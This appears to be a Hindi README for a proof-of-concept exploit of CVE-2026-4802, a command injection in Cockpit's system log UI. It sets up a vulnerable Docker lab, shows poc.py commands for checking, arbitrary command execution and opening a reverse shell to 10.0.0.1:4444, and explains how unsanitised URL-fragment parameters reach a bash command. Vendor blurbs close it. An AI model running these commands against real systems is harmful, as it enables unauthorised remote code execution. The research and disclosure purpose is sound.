
CVE-2026-4802 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cockpit के सिस्टम लॉग UI में एक कमांड इंजेक्शन भेद्यता है, जो मनमाने कमांड निष्पादन और रिवर्स शेल को सक्षम बनाता है।
CVE-2026-4802 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, कॉकपिट के सिस्टम लॉग UI (loadServiceFilters()) में कमांड इंजेक्शन के माध्यम से रिमोट कोड निष्पादन
कमजोर वातावरण बनाएं और चलाएं:
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln
# जांचें कि लक्ष्य कमजोर है या नहीं
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check
# मनमाने कमांड निष्पादित करें
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"
# रिवर्स शेल
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444
pkg/systemd/logsJournal.jsx शामिल है)pkg/systemd/logsJournal.jsx में loadServiceFilters() फ़ंक्शन /bin/bash -ec को पास करने से पहले केवल स्पेस एस्केपिंग के साथ ऐरे को स्ट्रिंग्स में जोड़कर शेल कमांड बनाता है। लॉग्स पेज URL फ्रैगमेंट (जैसे --since=) से उपयोगकर्ता-नियंत्रित पैरामीटर बिना सैनिटाइज़ किए इस कोड पथ तक पहुंचते हैं, जिससे कमांड सब्स्टीट्यूशन ($(...)) जैसे शेल मेटाकैरेक्टर इंजेक्ट करने की अनुमति मिलती है।
यह टूल केवल शैक्षिक और शोध उद्देश्यों के लिए है। इसका उपयोग केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है। लेखक इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
QuimeraX Intelligence एक उन्नत EASM और साइबर खतरा खुफिया प्लेटफ़ॉर्म है जो जटिल सिस्टमों में महत्वपूर्ण कमजोरियों की पहचान करने में विशेषज्ञता रखता है। प्लेटफ़ॉर्म सुरक्षा खतरों के बारे में ग्राहकों को सक्रिय रूप से निगरानी, पता लगाने और सतर्क करता है, जिससे संभावित जोखिमों के प्रति पारदर्शिता और त्वरित प्रतिक्रिया सुनिश्चित होती है। यदि ग्राहकों के सिस्टम कमजोर पाए जाते हैं, तो उन्हें तुरंत सूचनाएं और व्यापक रिपोर्ट प्राप्त होती हैं, जिससे वे सुरक्षात्मक कार्रवाई कर सकें। और जानें
Hakai Security एक साइबर सुरक्षा कंपनी है जिसकी स्थापना सुरक्षा पेशेवरों द्वारा की गई है, जो तकनीकी उत्कृष्टता के लिए प्रतिबद्ध है। हम उन्नत पेनेट्रेशन टेस्टिंग, यथार्थवादी रेड टीम सिमुलेशन और सुरक्षित विकास प्रथाओं सहित अनुकूलित सुरक्षा समाधान प्रदान करते हैं ताकि ग्राहकों की संपत्तियों को विकसित हो रहे साइबर खतरों से सक्रिय रूप से सुरक्षित रखा जा सके।